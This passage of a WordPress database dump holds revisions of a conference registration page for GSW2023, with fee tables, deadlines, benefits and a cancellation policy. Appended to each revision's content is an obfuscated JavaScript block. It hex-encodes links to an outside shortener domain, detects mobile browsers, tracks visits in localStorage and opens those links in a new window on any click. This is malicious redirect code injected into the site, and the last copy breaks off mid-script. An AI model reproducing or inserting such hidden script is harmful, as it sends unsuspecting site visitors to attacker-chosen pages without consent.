_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2023-02-05 08:22:09','2023-02-05 08:22:09','',2638,'https://gsw2023.com/?p=3779',0,'revision','',0),
(3780,1,'2023-02-05 08:24:01','2023-02-05 08:24:01','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt;\"><strong>THE REGISTRATION FORM IS NOW OPEN IN CONFTOOL:<a href=\"https://www.conftool.com/gsw2023/\">!REGISTER NOW!.</a></strong></span></p>\n<p>&nbsp;[/bsf-info-box][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt; font-family: Arial, Helvetica, sans-serif;\">The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</span></p>\n<p>&nbsp;[/bsf-info-box][ultimate_info_table color_scheme=\"gray\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\" heading_font_style=\"font-weight:bold;\"]&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td rowspan=\"2\"></td>\n<td colspan=\"3\">\n<h5><strong>Standard</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Student/Senior</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Accompanying person</strong></h5>\n</td>\n</tr>\n<tr>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n</tr>\n<tr>\n<td>\n<h6>1<strong> Day</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>2 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong> $200</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>3 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $450</strong></h6>\n</td>\n<td>\n<h6><strong>$500</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>4 Days</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong>$600</strong></h6>\n</td>\n<td>\n<h6><strong>$650</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>5 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $650</strong></h6>\n</td>\n<td>\n<h6><strong>$700</strong></h6>\n</td>\n<td>\n<h6><strong>$750</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$225</strong></h6>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][bsf-info-box icon_size=\"32\" title_font=\"font_family:Raleway|font_call:Raleway\"]<span style=\"font-family: Arial, Helvetica, sans-serif;\"><strong><span style=\"font-size: 14pt; color: black;\">Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</span></strong></span></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]&nbsp;</p>\n<p><strong><span style=\"font-size: 14pt;\">Registration deadlines</span></strong></p>\n<ul>\n<li>Early bird registration deadline: May 1, 2023</li>\n<li>Late registration deadline: July 1, 2023</li>\n</ul>\n<p><strong> </strong></p>\n<p><span style=\"font-size: 14pt;\"><strong>Important Notes:</strong></span></p>\n<ul>\n<li>Sc and M.Sc students are considered undergraduate university students or just graduated (3 months) and should upload a valid evidence of their student status when registering in ConfTool. PhD students should be max 30 years old and should provide valid evidence of their student status when registering in ConfTool.</li>\n<li>Seniors are considered participants over 65 years old September 2, 2023 and can show a valid ID on arrival.</li>\n<li>Any Registration allows a participant to present one paper accepted for publication. A participant can only have one registration!</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration Benefits</strong></span></p>\n<ul>\n<li><strong>Standard and student / senior (over 65) registration fees include:</strong></li>\n<li>Entry to all sessions/workshops;</li>\n<li>Entry to the Exhibition;</li>\n<li>Copy of Final Programme;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n<li>Lunches;</li>\n<li>Attendance at Welcome Reception (September 2, 2023);</li>\n<li>Attendance at Exhibitors Reception;</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li><span style=\"font-size: 14pt;\"><strong>Accompanying person fee includes:</strong></span></li>\n<li>Entry to Opening Session;</li>\n<li>Attendance at Welcome Reception;</li>\n<li>Attendance at Exhibitors Reception;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Cancellation policy:</strong></span></p>\n<ul>\n<li>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than June 1st, 2023. No refunds after this date, but replacement is allowed.</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Two social dinners will be organized on Tuesday and Thursday.</strong></span></p>\n<h5 style=\"text-align: justify; color: red;\"></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2023-02-05 08:24:01','2023-02-05 08:24:01','',2638,'https://gsw2023.com/?p=3780',0,'revision','',0),
(3781,1,'2023-02-05 08:29:19','2023-02-05 08:29:19','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt;\"><strong>THE REGISTRATION FORM IS NOW OPEN IN CONFTOOL:<a href=\"https://www.conftool.com/gsw2023/\">!REGISTER NOW!.</a></strong></span></p>\n<p>&nbsp;[/bsf-info-box][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt; font-family: Arial, Helvetica, sans-serif;\">The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</span></p>\n<p>&nbsp;[/bsf-info-box][ultimate_info_table color_scheme=\"gray\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\" heading_font_style=\"font-weight:bold;\"]&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td rowspan=\"2\"></td>\n<td colspan=\"3\">\n<h5><strong>Standard</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Student/Senior</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Accompanying person</strong></h5>\n</td>\n</tr>\n<tr>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n</tr>\n<tr>\n<td>\n<h6>1<strong> Day</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>2 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong> $200</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>3 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $450</strong></h6>\n</td>\n<td>\n<h6><strong>$500</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>4 Days</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong>$600</strong></h6>\n</td>\n<td>\n<h6><strong>$650</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>5 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $650</strong></h6>\n</td>\n<td>\n<h6><strong>$700</strong></h6>\n</td>\n<td>\n<h6><strong>$750</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$225</strong></h6>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][bsf-info-box icon_size=\"32\" title_font=\"font_family:Raleway|font_call:Raleway\"]<span style=\"font-family: Arial, Helvetica, sans-serif; font-size: 14pt;\"><strong>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</strong></span></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<strong><span style=\"font-size: 14pt;\">Registration deadlines</span></strong></p>\n<ul>\n<li>Early bird registration deadline: May 1, 2023</li>\n<li>Late registration deadline: July 1, 2023</li>\n</ul>\n<p><strong> </strong></p>\n<p><span style=\"font-size: 14pt;\"><strong>Important Notes:</strong></span></p>\n<ul>\n<li>Sc and M.Sc students are considered undergraduate university students or just graduated (3 months) and should upload a valid evidence of their student status when registering in ConfTool. PhD students should be max 30 years old and should provide valid evidence of their student status when registering in ConfTool.</li>\n<li>Seniors are considered participants over 65 years old September 2, 2023 and can show a valid ID on arrival.</li>\n<li>Any Registration allows a participant to present one paper accepted for publication. A participant can only have one registration!</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration Benefits</strong></span></p>\n<ul>\n<li><strong>Standard and student / senior (over 65) registration fees include:</strong></li>\n<li>Entry to all sessions/workshops;</li>\n<li>Entry to the Exhibition;</li>\n<li>Copy of Final Programme;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n<li>Lunches;</li>\n<li>Attendance at Welcome Reception (September 2, 2023);</li>\n<li>Attendance at Exhibitors Reception;</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li><span style=\"font-size: 14pt;\"><strong>Accompanying person fee includes:</strong></span></li>\n<li>Entry to Opening Session;</li>\n<li>Attendance at Welcome Reception;</li>\n<li>Attendance at Exhibitors Reception;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Cancellation policy:</strong></span></p>\n<ul>\n<li>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than June 1st, 2023. No refunds after this date, but replacement is allowed.</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Two social dinners will be organized on Tuesday and Thursday.</strong></span></p>\n<h5 style=\"text-align: justify; color: red;\"></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else 